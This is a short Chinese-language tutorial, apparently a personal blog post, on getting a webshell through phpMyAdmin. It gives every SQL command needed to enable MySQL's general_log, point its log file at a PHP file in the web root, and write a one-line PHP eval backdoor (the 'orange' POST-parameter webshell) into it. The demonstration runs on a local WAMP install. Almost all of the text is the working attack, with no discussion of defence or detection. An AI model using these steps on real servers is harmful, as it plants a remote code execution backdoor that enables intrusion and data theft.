經過 phpmyadmin getshell

經過 phpmyadmin  getshell

general_log默認爲關閉的，root權限開啓後，general_log_file會保存全部的查詢語句

能夠開啓general_log，而後設置general_log_file爲一個php文件，最後用一句話木馬進行查詢來獲取shell

進入phpmyadmin後在SQL處執行SQL語句

首先查看general log是否開啓

show variables like 'general_log';

 

general log是關閉狀態，執行SQL語句開啓general log

SET GLOBAL general_log = ON

 

 

開啓成功

而後把general_log_file設置爲shell的絕對路徑

SET global general_log_file='D:/wamp/www/orange.php';

 

看下剛剛建立的orange.php裏的內容

 

而後執行SQL查詢語句，寫個一句話進去。

SELECT '<?php @eval($_POST["orange"]);?>';

 

如今再看下orange.php裏面的內容

成功插入了一句話木馬

一句話連接在根目錄（http://127.0.0.1/orange.php）

 

 

至此結束！

任重而道遠！